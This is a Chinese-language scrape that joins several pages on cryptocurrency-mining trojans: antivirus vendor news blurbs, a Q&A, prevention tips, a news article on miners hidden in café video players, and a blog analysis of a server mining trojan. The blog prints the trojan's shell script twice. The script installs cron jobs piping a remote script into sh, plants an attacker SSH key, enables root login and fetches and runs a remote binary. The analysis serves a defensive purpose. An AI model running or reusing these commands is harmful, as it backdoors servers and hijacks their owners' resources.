近日，腾讯御见威胁情报中心监控到恶性锁主页Rootkit病毒通过网络盗版Ghost系统渠道传播，用户一旦中招，浏览器主页将会被篡改为带有推广渠道ID的导航网站，为病毒作者赚“黑钱”。同时该病毒还极有可能转变为挖矿、勒索等更危险的行为。目前，腾讯电脑管家已拦截并查杀该病毒。
腾讯电脑管家接到网友反馈，其在Steam下载语音交流工具后，Steam帐号自动掉线并无法登陆。经分析，该Steam盗号木马伪装成多人语音工具、变声器等诱导下载以盗取用户账号密码。目前该盗号木马变种达一千多个，影响用户较广。游戏用户可到官方网站下载正版软件，电脑管家已可查杀拦截此木马。
腾讯御见威胁情报中心在多个流行的Ghost系统中检测到一款名为Jomalone(“独狼”)的Rootkit后门木马，劫持23款主流浏览器主页牟利，并利用Rootkit木马特性与安全软件对抗。目前，腾讯电脑管家已全面拦截“独狼”Rootkit木马。
近日，许多网友遇到一个共同的困扰：电脑桌面上突然出现“变态修仙”快捷方式，并且极难删除。腾讯电脑管家监测发现，这是一款名为“毒雨”的木马在作祟，每逢周末时段便异常活跃，疯狂向电脑推送电商广告链接、游戏快捷方式、广告弹窗、软件推装等，给用户带来了严重困扰。
今年的端午“巧遇”父亲节，又恰逢“618”电商年中大促，众多节点交集在一起，各大电商平台纷纷推出促销活动。然而，一些不法分子却从中发现了“商机”，将编制的木马病毒伪装成正常软件进行大肆投毒。病毒入侵后会劫持电脑浏览器并导航到指定促销页面，病毒作者则凭借访问流量赚取推广佣金。
加密货币账户突然被盗，很有可能是挖矿木马在捣乱。近日，腾讯御见威胁情报中心捕获了一组具有蠕虫特性的挖矿木马“SecretMiner”，隐藏在色情电子书（.chm文件）中进行传播，劫持中招用户的虚拟货币交易账户，还能自动将病毒下载链接分享到社交平台进行传播。
腾讯电脑管家监控到一冒充“公检法”机关的电信诈骗团伙出没，其不仅诱导用户登录假冒“公检法”网站，还会让用户下载远控工具，以此远程操作用户电脑转走钱财。请大家使用电脑管家拦截病毒，同时用诈骗信息查询功能识别钓鱼网站。
近日，腾讯御见威胁情报中心监测发现一款名为“美人蝎”的挖矿木马，利用美女图片加密传递矿池信息，隐藏在各类辅助软件中进行传播。该木马不仅利用超隐蔽的DNS隧道通信技术对抗杀毒软件的检测，还深谙“不把鸡蛋放在一个篮子里”的道理，同时开挖4种加密货币防控风险，上演了一连串的“美人心计”。
腾讯电脑管家检测到Sigrun勒索病毒在国内呈活跃趋势，其通过带有宏病毒的office文档传播，加密文件后以“.sigrun”作为后缀。目前，腾讯电脑管家已可拦截此病毒攻击。
腾讯御见威胁情报中心捕获Bondat蠕虫病毒最新变种，借助U盘及移动硬盘传播并构建僵尸网络，不仅继承了以往版本锁浏览器主页、挖门罗币的功能，还会下载运行GandCrab3勒索病毒，“联手”对用户电脑发起攻击。
近日，腾讯御见威胁情报中心监测到一款来自俄罗斯的挖矿木马，正通过Windows、Office等软件注册机、破解工具大肆传播。除了挖矿外，该木马还会泄露用户隐私、窃取加密货币钱包信息，甚至还能远程控制中毒电脑发起DDoS攻击，堪称病毒界的“全能选手”。
人在江湖飘，会“装”最重要。来听“黑帮”大佬的“辉煌”往事。
继勒索病毒GandCrab、GandCrabV2之后，腾讯安全反病毒实验室又截获了利用CVE-漏洞传播的第三代勒索病毒GandCrabV3，其触发漏洞后释放包含“?????”（韩语“你好”）的诱饵文档，并通过邮件迅速传播，同时要求中招者用Tor网络或者Jabber即时通讯软件获取赎金金额。再次提醒警惕启不明来源的邮件，并使用腾讯御界防APT邮件网关抵御攻击。
网上挖矿真的能赚钱吗？近日，腾讯电脑管家捕获了一款“闷声发大财”的挖矿木马：自2016年首次被发现至今，PhotoMiner木马参与门罗币挖矿的累计收入已高达8900万人民币，堪称名副其实的“黄金矿工”。该木马再度出现活跃迹象，正通过入侵感染FTP和SMB服务器进行大范围传播。
腾讯电脑管家监测发现一例会加密机器上所有exe，dll，sys等后缀文件的勒索病毒，其加密文件后，会添加137个字符的后缀名，并要求受害者在24小时内交赎金。腾讯电脑管家将持续监测和关注病毒动态，请大家提高警惕，使用电脑管家实时拦截病毒。
近日，据腾讯电脑管家监测发现，国内某知名Ghost镜像重装系统中被植入病毒“双枪2”，该病毒不仅不能通过重装清除，还会切断杀毒软件联网，导致杀毒软件安全功能被破坏。受害者的浏览器主页被锁定为带有“33845”编号的网址导航站，同时“双枪2”病毒会在系统预留后门以窃取用户敏感信息。
近日，腾讯御见威胁情报中心监测到一款挖取门罗币的木马，其竟伪装成“装修教程视频”文件进行传播，不仅大肆侵占中招用户的电脑资源，且能通过破坏市面上多达22款主流杀毒软件的功能而长期存在。
近日，腾讯电脑管家捕获Office公式编辑器漏洞（CVE-/CVE-）新变种——其采用新的存储结构并抹掉了“EquationNative”流内的一些特征数据，让一些安全软件无法检测。
近日，腾讯安全御见威胁情报中心捕获一个名为WannaMiner的挖矿木马，该木马利用“永恒之蓝”漏洞在局域网内攻击传播，将染毒机器构建成一个健壮的僵尸网络，支持内网自更新，长期潜伏在电脑中以挖取门罗币。截至目前，国内已有近600家企业逾3万台电脑受到感染。
腾讯安全反病毒实验室捕获新型国产MBR勒索病毒样本，用户中招后，就会被加密系统MBR，导致无法开机。经分析发现，该家族MBR勒索病毒使用硬编码的密码，原始的MBR信息也保存在磁盘分区中。请大家提高警惕，下载使用电脑管家可完美查杀该病毒。
为了保证高考考生查分安全，电脑管家上线高考查分防骗指南，保障考生上网权益。挖矿木马该怎么防范？_百度知道
挖矿木马该怎么防范？
答题抽奖
首次认真答题后
即可获得3次抽奖机会，100%中奖。
低抛高吸_1976知道合伙人
低抛高吸_1976
采纳数：203520
获赞数：217837
下载杀毒杀木马软件打开监控保护您的电脑，还有就是下载还原软件，自带的映像备份备份自己的电脑，如果有杀不了的病毒和木马还原就是了。
为你推荐：
其他类似问题
您可能关注的内容
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。博客访问： 20860
博文数量： 13
博客积分： 10
博客等级： 民兵
技术积分： 140
注册时间：
公众号：RiboseYim
个人站点：http://riboseyim.github.io?source=chinaunix
分类： 网络与安全 10:07:56
书接上文，针对编号101样本的分析，我们已经知道，黑色产业界通过植入木马，控制了大量主机资源，只要有人花钱，
就可以按需要调度足够的资源发动DDos攻击，据说还可以按效果付费。
此外，还有一种常见模式则是“挖矿木马”，首先还是来看样本：
root 3744 29921 0 19:53 pts/0 00:00:00 grep min
root 31333 1 99 19:48 ? 02:46:38 /opt/minerd -B -a cryptonight
-o stratum+tcp: 48vKMSzWMF8TCVvMJ6jV1BfKZJFwNXRntazXquc7fvq9DW23GKk
cvQMinrKeQ1vuxD4RTmiYmCwY4inWmvCXWbcJHL3JDwp -p x
uptime看到的负载值非常高。
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ];
then mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq echo "PermitRootLogin yes" >> /etc/ssh/sshd_config echo "RSAAuthentication yes" >> /etc/ssh/sshd_config echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
if [ ! -f "/etc/init.d/lady" ];
then if [ ! -f "/etc/systemd/system/lady.service" ];
then mkdir -p /opt
curl -fsSL https://r.chanstring.com/v12/lady_`uname -i` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 fi fi service lady start
systemctl start lady.service
/etc/init.d/lady start
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ];
then mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq echo "PermitRootLogin yes" >> /etc/ssh/sshd_config echo "RSAAuthentication yes" >> /etc/ssh/sshd_config echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
if [ ! -f "/etc/init.d/lady" ];
then if [ ! -f "/etc/systemd/system/lady.service" ];
then mkdir -p /opt
curl -fsSL https://r.chanstring.com/v12/lady_`uname -i` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 fi fi service lady start
systemctl start lady.service
/etc/init.d/lady start
mkdir -p /opt
被植入比特币“挖矿木马”的电脑，系统性能会受到较大影响，电脑操作会明显卡慢、散热风扇狂转；另一个危害在于，“挖矿木马”会大量耗电，并造成显卡、ＣＰＵ等硬件急剧损耗。比特币具有匿名属性，其交易过程是不可逆的，被盗后根本无法查询是被谁盗取，流向哪里，因此也成为黑客的重点窃取对象。
植入方式：安全防护策略薄弱，利用Jenkins、Redis等中间件的漏洞发起攻击，获得root权限。
最好的防御可能还是做好防护策略、严密监控服务器资源消耗（CPU／load）。
这种木马很容易变种，很多情况杀毒软件未必能够识别：
c05b2c5f8fd62e98dba6de45c7d751a2e
阅读(4080) | 评论(0) | 转发(0) |
给主人留下些什么吧！~~
请登录后评论。黑客爽翻了！挖矿木马曝光：已薅走几百万羊毛！黑客爽翻了！挖矿木马曝光：已薅走几百万羊毛！智能帮官方百家号今日（1月16日），360安全卫士官方账号发文披露了几款会在后台偷偷进行挖矿的视频播放软件。360声称，黑客们在网吧电脑中多款视频播放软件中植入挖矿木马，已经获取了高达百万元的利益。（360曝光存在挖矿行为的3款视频播放软件和它们的的文件信息）这些视频播放软件在利用网吧资源“挖矿”的同时，也在严重影响电脑的正常工作。造成机器性能下降这笔硬件损耗先不说，还增加一大笔不必要的电费。大家都知道，网吧绝大部分的电脑都是处于长时间运行的状态，有的甚至达到7X24小时。综合目前网吧电脑的配置性能和耗电量来算，用网吧电脑挖矿是处于亏严重损的状态。黑客们究竟是如何在网吧老板身上薅这么一大波数字货币的羊毛呢？据了解，这些视频播放器里面都有一个明显的特征，就是都包含一个叫做flashapp.dll的核心组件。这个组件的作用会从服务器总下载对应的挖矿程序并开始执行挖矿指令。该组件能通过随机算法选择从哪个服务器上下载挖矿程序，而主要在挖的数字货币有门罗币（XMR）、超级现金（SHR）、比特币钻石（BCD）和云储币（SIA）等。一些脚本甚至会以“删除顽固桌面广告图标”、“Steam防卡更新”和“文网卫士”等文件路径来经行伪装。据360团队追踪发现，这些视频播放器在17年7月就已经有挖矿的行为，其中传播量最大的挖矿程序在17年8月底开始传播，而日传播量最大已经超过千次。目前为止这些挖矿行为仍然处于活跃状态。360安全团队还分析了其中一个挖矿程序中的门罗币钱包地址，黑客门利用了几十个不同的门罗币钱包地址，而这几十个钱包中包含的门罗币数量在1个到200个，总价值已经超过百万元人民币。根据其中一台机器挖门罗币的收益情况可以发现，一台网吧电脑挖矿的收益甚至连电费都不能回本。网吧老板们变成了”挖矿小弟”，不仅一毛钱没挣到，还亏了电费和硬件损耗的费用其实，随着17年这一波数字货币的大涨，黑客们的攻击目标已经从数据资料、用户资产扩展到用户设备的CPU资源上。简单来说，当我们在浏览网页的时候都被黑客攻击，在不知情况下变成数字货币挖矿的肉鸡。虽然黑客劫持用户电脑变成肉鸡已经不是什么新鲜事，但在数字货币价值持续上涨的情况下，此类攻击的出现频率只会越来越多。智能帮在此建议大家，在爱惜自己的电脑同时，注意要避开一些不靠谱的网站和选择对的正版软件。本文由百家号作者上传并发布，百家号仅提供信息发布平台。文章仅代表作者个人观点，不代表百度立场。未经作者许可，不得转载。智能帮官方百家号最近更新：简介:为你提供最有用和最有趣的智能产品信息作者最新文章相关文章比特币挖矿木马简单的预防方法
& 发布时间： 14:41:49 & 作者：佚名 &
显卡挖掘虚拟货币比特币的效率远比 CPU 要高。如果你是一位 3D 游戏玩家，正好中了比特币挖矿木马，就会发现在玩游戏时会非常卡顿，下面与大家分享下比特币挖矿木马简单的预防方法
　　现在比特币的价格涨得很高，所以现在有黑客专门制造挖矿木马来诱导网友，从而达到控制电脑上的显卡来挖掘比特币。为什么木马要控制电脑中的显卡呢?因为显卡挖掘虚拟货币比特币的效率远比 CPU 要高。如果你是一位 3D 游戏玩家，正好中了比特币挖矿木马，就会发现在玩游戏时会非常卡顿。下面介绍一些简单的预防方法。
　　工具/原料防病毒软件
　　方法一、安装杀病毒软件更新病毒库在电脑上安装反病毒软件，及时更新最新的病毒库文件。打开反病毒软件，点击软件上的立即升级。
　　当更新完成后，可能需要我们重新启动来生效。
　　方法二、预防网上热门的视频文件现在的病毒木马都喜欢伪装成当下最流行的一些视频，比如热映电影《致青春》、《中国合伙人》等。所以当我们在上网观看或者下载视频时就需要留意当前下载的视频文件是否安全了。一般的视频文件应该都是上百兆的，如果遇到一些容量比很小的以影视名称命名的文件，就应该引起格外注意了。
　　上网时不要随意打开一些不知名的网站。比如我们在群里看到别人发出的一些网址链接，不要轻易点击。
　　尽量去正规大型的可信度高的网站，这样可以使得我们的上网安全得到保证。比如我们可以在 hao123 首页上找到我们想要去的网站。
大家感兴趣的内容
12345678910
最近更新的内容